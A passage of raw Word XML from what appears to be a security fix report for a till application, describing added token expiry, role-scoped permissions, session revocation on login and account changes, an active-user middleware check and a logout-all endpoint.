          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>expires_at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> column; nothing ever set it. This is also what made V-13 catastrophic rather than merely serious: a token stolen by XSS was good forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E188F7" w14:textId="41B1BCE5" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="0"/>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1472" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4584E80F" wp14:editId="16C77346">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4256782</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-9524</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26569" name="Group 26569"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="342900" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="342900" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1363" name="Shape 1363"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4651"/>
                                  <a:pt x="342900" y="6890"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="126448"/>
                                  <a:pt x="341970" y="128687"/>
                                  <a:pt x="340110" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="132407"/>
                                  <a:pt x="336005" y="133338"/>
                                  <a:pt x="33337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2AF4CC5" id="Group 26569" o:spid="_x0000_s1026" style="position:absolute;margin-left:335.2pt;margin-top:-.75pt;width:27pt;height:10.5pt;z-index:-251435008" coordsize="3429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OXTAMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9q8CrEDtFkuRRs0&#10;6QcwFGUJoESBpC27X9/hSKQkOwjaxAeZ5Gxv3gyX65tjxb0Dk6oU9caPrkLfYzUVWVnvNv7v5/sv&#10;K99TmtQZ4aJmG//ElH+z/fzpum1SFotC8IxJD5zUKm2bjV9o3aRBoGjBKqKuRMNqEOZCVkTDVO6C&#10;TJIWvFc8iMNwEbRCZo0UlCkFq7ed0N+i/zxnVP/Mc8W0xzc+YNP4lfh9Md9ge03SnSRNUdIeBnkH&#10;ioqUNQR1rm6JJt5elheuqpJKoUSur6ioApHnJWWYA2QThWfZPEixbzCXXdruGkcTUHvG07vd0h+H&#10;B9k8NY8SmGibHXCBM5PLMZeV+QeU3hEpOznK2FF7FBaTWbwOgVgKoihJknlPKS2A9wsrWty9aRfY&#10;oMEESttAc6ghf/Wx/J8K0jCkVaWQ/6P0ysygXyS+V5MKuhQ1PFxBWlDPkaRSBXx9jCGXKUnpXukH&#10;JpBqcviudNeTmR2Rwo7osbZDCZ39Zk83RBs7g9IMvXaoVeFKZaSVOLBngXraFGw9j+e+ZysNOAcF&#10;Xo8VodrJcqpqFej+paRf2Z+p+iIMR+qAC+MlySqGrjER10nfPb1kFkZRJ4mX68jsVYAz9T2dWbto&#10;vezsZos52rlgfbtCsMVqfRat62SDw1DwWjSbn43jLKLYZNHbWK3XsY1sFrPZytgM6BzwKF4tVsup&#10;0LERJeF8hsJ/42NgOEriWTh1m7iymP2bTAENJR4290VMm2/HiuufiYXVeY0TqETXF5cAoH5dIS+B&#10;Q0tY0X+xYZrMNNslw3b9vCx2fVTiaRo2uY6ATn3UQ1Y8NRorn/eixXjevi7n/9oPjsSz/eV4n+wD&#10;Vz9cvSg25UKxbm+YcwW3pDtrUHs4zXhtjh3ggxK42nNONN6RVanhzudlZYqwDOH66PzxGryZs747&#10;XnGkT5yZDcLrXyyHcxrvIbOg5O7lG5fegZibHX/onPCmIP1q77dXRajox9jnJefOZYSmE5d3t/fx&#10;/aL30CsbO4aPCmcZdpa0R9O9LOB+hqTt+wJIcUYYWdTa2dfwKsIgo2zN8EVkJ7yTkRC4/JAafAZg&#10;Hv2TxbwzxnPUGh5W278AAAD//wMAUEsDBBQABgAIAAAAIQB6ca1T4AAAAAkBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/BTsJAEIbvJr7DZky8wbZIAWu3hBD1REwEE+Jt6A5tQ3e36S5teXvHkx5n5ss/&#10;35+tR9OInjpfO6sgnkYgyBZO17ZU8HV4m6xA+IBWY+MsKbiRh3V+f5dhqt1gP6nfh1JwiPUpKqhC&#10;aFMpfVGRQT91LVm+nV1nMPDYlVJ3OHC4aeQsihbSYG35Q4UtbSsqLvurUfA+4LB5il/73eW8vX0f&#10;ko/jLialHh/GzQuIQGP4g+FXn9UhZ6eTu1rtRaNgsYzmjCqYxAkIBpazOS9OTD4nIPNM/m+Q/wAA&#10;AP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8B&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDBWmOXTAMAAKAJAAAOAAAAAAAAAAAAAAAAAC4C&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB6ca1T4AAAAAkBAAAPAAAAAAAAAAAAAAAA&#10;AKYFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAswYAAAAA&#10;">
                <v:shape id="Shape 1363" o:spid="_x0000_s1027" style="position:absolute;width:342900;height:133350;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3429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TvwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFLyZjVpCiK4iUqFHGwttb0N2TNJmZ9Ps1iT99V1B8DaP9znr7WAacaHO1ZYVzKMYBHFh&#10;dc2lgrfTYZaCcB5ZY2OZFIzkYLt5mKwx07bnV7rkvhQhhF2GCirv20xKV1Rk0EW2JQ7c2XYGfYBd&#10;KXWHfQg3jVzEcSIN1hwaKmxpX1Hxnf8aBcfP/Y99LgstbZN+/CVf4xO/50pNH4fdCoSnwd/FN/eL&#10;DvOXyRKu34QT5OYfAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdZak78MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l333375,v2630,,4875,930,6735,2791c341970,4651,342900,6890,342900,9525r,114300c342900,126448,341970,128687,340110,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,34290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2496" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C9E0683" wp14:editId="556CD7BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>999232</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>504825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1095375" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26570" name="Group 26570"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1095375" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1095375" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1369" name="Shape 1369"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1095375" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1095375" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1085850" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1088480" y="0"/>
                                  <a:pt x="1090725" y="930"/>
                                  <a:pt x="1092585" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1094445" y="4638"/>
                                  <a:pt x="1095375" y="6890"/>
                                  <a:pt x="1095375" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1095375" y="126454"/>
                                  <a:pt x="1094445" y="128699"/>
                                  <a:pt x="1092585" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1090725" y="132420"/>
                                  <a:pt x="1088480" y="133350"/>
                                  <a:pt x="1085850"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21984BE" id="Group 26570" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.7pt;margin-top:39.75pt;width:86.25pt;height:10.5pt;z-index:-251433984" coordsize="10953,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JmTwMAALIJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1pty0bsAG2WS9EG&#10;TfoBNE1ZAihRIOmtX9/hSKQlOQ2axAeZ5Myb5c1wub45VtzbM6lKUS/96Cr0PVZTsSnr7dL//Xz/&#10;JfM9pUm9IVzUbOmfmPJvVp8/XR+aBYtFIfiGSQ+M1GpxaJZ+oXWzCAJFC1YRdSUaVoMwF7IiGqZy&#10;G2wkOYD1igdxGE6Dg5CbRgrKlILV21bor9B+njOqf+a5YtrjSx9i0/iV+F2bb7C6JoutJE1R0i4M&#10;8o4oKlLW4NSZuiWaeDtZXpiqSiqFErm+oqIKRJ6XlGEOkE0UjrJ5kGLXYC7bxWHbOJqA2hFP7zZL&#10;f+wfZPPUPEpg4tBsgQucmVyOuazMP0TpHZGyk6OMHbVHYTEK55NkNvE9CrIoSZJJxyktgPgLGC3u&#10;XgcG1m0wCObQQHuoMwPqYww8FaRhSKxaAAOP0is3Jvzp3PdqUkGfooaHK0gM6jma1EIBYx/kyKVK&#10;FnSn9AMTyDbZf1e6bcuNHZHCjuixtkMJzf1qWzdEG5wJ0wy9Q69chauWEVdiz54FKmpTs/kkhpLa&#10;akOgZwVe9xWjMJtkUPK+rtWgu3VJv7I/I/0szXr6EBp6hD4KZ53TedL1kBPF4AR9xLNZZvYshDQ0&#10;P5w5YJqmLTCdJgjs+Wv7FpKcZvOxQydDJl5yaLN0rhwkipMMMmlBVu0f8fVA03SStseRM+mij+Js&#10;Op+PpI6UKAknE5T+Ly2O6iiJ03iUfOYq1N/PNqhzvc/SC7c26xbkummAsDovMQMVact2RtjCpdOu&#10;3S5Dj2dQR9OJbyTE9BvCLli26+Pa2PVeoYdp2ORaAlr1XitZ8RDUVx73pI1x3Mcu5zftDEfiaKs5&#10;3gct4eqHqxfFplwo1na7OWZwc7qjB7XPhxuvzSkEfFACl33OicZbsyo1vAJ4WUHt4lkYWke8Bmvm&#10;7G+PWxzpE2fmpOL1L5bDuY03k1lQcrv+xqW3J+auxx8aJ7wpSLfa7cpOFUNFOwafl5w7kxFCBybv&#10;bu/j+2lnoVM2OIbPDIcMWyTtomnfGnBjQ9L2xQGkOBB6FrV2+BreSeikl60ZrsXmhLc0EgKXIVKD&#10;DwPMo3vEmJdHf45a56fW6i8AAAD//wMAUEsDBBQABgAIAAAAIQAxbedq4AAAAAoBAAAPAAAAZHJz&#10;L2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGb3U1rrInZlFLUUynYCuJtm0yT0OxsyG6T9N87nvT4&#10;eB9vvslWk23FgL1vHGmIZgoEUuHKhioNn4e3h2cQPhgqTesINVzRwyq/vclMWrqRPnDYh0rwCPnU&#10;aKhD6FIpfVGjNX7mOiTuTq63JnDsK1n2ZuRx28q5Uk/Smob4Qm063NRYnPcXq+F9NON6Eb0O2/Np&#10;c/0+xLuvbYRa399N6xcQAafwB8OvPqtDzk5Hd6HSi5ZzvHxkVMMyiUEwsJgnCYgjN0rFIPNM/n8h&#10;/wEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBg+QJmTwMAALIJAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAxbedq4AAAAAoBAAAPAAAAAAAAAAAA&#10;AAAAAKkFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAtgYAAAAA&#10;">
                <v:shape id="Shape 1369" o:spid="_x0000_s1027" style="position:absolute;width:10953;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="10953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X6wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JbsIw&#10;EL1X4h+sQeqtOFAVQsAg1KpSrywHjkM8xIF4HGITUr4eI1XqbZ7eOvNlZyvRUuNLxwqGgwQEce50&#10;yYWC3fb7LQXhA7LGyjEp+CUPy0XvZY6ZdjdeU7sJhYgh7DNUYEKoMyl9bsiiH7iaOHJH11gMETaF&#10;1A3eYrit5ChJxtJiybHBYE2fhvLz5moVJOn9cvkw7upP6eSrPe4nMuiDUq/9bjUDEagL/+I/94+O&#10;89/HU3h+E0+QiwcAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAqJHl+sMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l1085850,v2630,,4875,930,6735,2778c1094445,4638,1095375,6890,1095375,9525r,114300c1095375,126454,1094445,128699,1092585,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1095375,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ed:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8-hour expiry (one shop shift), configurable. Role-scoped abilities instead of </w:t>
      </w:r>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Prior tokens revoked on login one person, one active session, which is right for a till and means a stolen token dies when the real user next signs in. Tokens revoked on deactivation, role change, username change and password change, each with an audit entry naming the reason. A new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EnsureUserIsActive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware re-checks on </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> request as a backstop for anything that flips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F50541C" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="181" w:line="259"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3520" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B9D22C9" wp14:editId="664C4A8A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2542282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19786</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990600" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26573" name="Group 26573"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="990600" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="990600" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1377" name="Shape 1377"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="990600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="990600" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="983705" y="0"/>
                                  <a:pt x="985950" y="930"/>
                                  <a:pt x="987810" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="989670" y="4638"/>
                                  <a:pt x="990600" y="6890"/>
                                  <a:pt x="990600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="990600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="990600" y="135973"/>
                                  <a:pt x="989670" y="138212"/>
                                  <a:pt x="987810" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="985950" y="141932"/>
                                  <a:pt x="983705" y="142863"/>
                                  <a:pt x="981075"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F718359" id="Group 26573" o:spid="_x0000_s1026" style="position:absolute;margin-left:200.2pt;margin-top:-1.55pt;width:78pt;height:11.25pt;z-index:-251432960" coordsize="9906,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tTgMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9psyTJiB2izXIo2&#10;aNIPYGjKEkCJAklbdr++w5FIS3YQtIkPMsmZN8ub4XJ9c6i5t2dSVaJZ+dFV6HusoWJTNduV//v5&#10;/svC95QmzYZw0bCVf2TKv1l//nTdtUsWi1LwDZMeGGnUsmtXfql1uwwCRUtWE3UlWtaAsBCyJhqm&#10;chtsJOnAes2DOAzToBNy00pBmVKwetsL/TXaLwpG9c+iUEx7fOVDbBq/Er8v5husr8lyK0lbVnQI&#10;g7wjippUDTh1pm6JJt5OVhem6opKoUShr6ioA1EUFWWYA2QThWfZPEixazGX7bLbto4moPaMp3eb&#10;pT/2D7J9ah8lMNG1W+ACZyaXQyFr8w9Regek7OgoYwftUVjM8zANgVgKomgWL7J5TyktgfcLFC3v&#10;3sQF1mkwCaVroTnUKX/1sfyfStIypFUtIf9H6VUbiD7JMt9rSA1dihoeriAtqOdIUksFfH2MIZcp&#10;WdKd0g9MINVk/13pvic3dkRKO6KHxg4ldPabPd0SbXAmSjP0ulOtSlcqI63Fnj0L1NOmYPk8nvue&#10;rTTEeVLgzURxEYVQ7rGqVaC7l4p+ZX+m6kkWjtQhrt7fYp7PoYPAY54MG9JKMnCBkjjLFqaxIJyp&#10;7enM4vI063GzNEGccza0KzhLF/nU20mEFLzmzeY3+DkhoiRJIIkeY7VejW2MmedZ0m+Xi8CjZBFH&#10;8VTo2IhmYZih8B/5cAxHsyhPzsy6spj9m54F5Ep82twXPm2+QxK2fyYIq/MaJ1CJvi8uA5ilQ2tc&#10;Bh5nUD/TNf/LBjQZwi4YtuvnZbHroxJP07DJ9QT06qMesuIpaKx80YtDjOft63L+r/3gSDzbX473&#10;6T6w9bPtPA2bcqFY3+fmXMEt6c4abI3TacYbc+wAH5TA1V5wovGOrCsNdz6vaqhdnIVwfdh9A9bM&#10;Wd8frzjSR87M2cSbX6yAcxrvIbOg5PblG5fenpibHX9onPC2JMPqYHdQxVDRjsEXFefOZITQicm7&#10;2/v4Ph0sDMoGx/BR4ZBhj6RDNP3LAu5nSNq+L4AUB0LPotEO38CrCJ2MsjXDF7E54p2MhMDlh9Tg&#10;MwDzGJ4s5p0xnqPW6WG1/gsAAP//AwBQSwMEFAAGAAgAAAAhAC9mvZngAAAACQEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8FKw0AQhu+C77CM4K3djU2KxmxKKeqpCLZC6W2bTJPQ7GzIbpP07R1PepyZ&#10;j3++P1tNthUD9r5xpCGaKxBIhSsbqjR8799nzyB8MFSa1hFquKGHVX5/l5m0dCN94bALleAQ8qnR&#10;UIfQpVL6okZr/Nx1SHw7u96awGNfybI3I4fbVj4ptZTWNMQfatPhpsbisrtaDR+jGdeL6G3YXs6b&#10;23GffB62EWr9+DCtX0EEnMIfDL/6rA45O53clUovWg2xUjGjGmaLCAQDSbLkxYnJlxhknsn/DfIf&#10;AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMug/61OAwAAoAkAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAC9mvZngAAAACQEAAA8AAAAAAAAAAAAA&#10;AAAAqAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAC1BgAAAAA=&#10;">
                <v:shape id="Shape 1377" o:spid="_x0000_s1027" style="position:absolute;width:9906;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9906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TzwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBG81q8IqW6OIWOyhl0YPHqebaXbpZrIkqa799U2h0Ns83uest4PrxJVCbD0rmE0LEMS1&#10;Ny1bBefT8+MKREzIBjvPpOBOEbab0cMaK+Nv/EZXnazIIRwrVNCk1FdSxrohh3Hqe+LMffjgMGUY&#10;rDQBbzncdXJeFKV02HJuaLCnfUP1p/5yCnzttT1eXg+XTht619/lwYZSqcl42D2BSDSkf/Gf+8Xk&#10;+YvlEn6/ySfIzQ8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAIH2088MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l981075,v2630,,4875,930,6735,2778c989670,4638,990600,6890,990600,9525r,123825c990600,135973,989670,138212,987810,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,990600,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> without going through the controller. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /logout-all</w:t>
      </w:r>
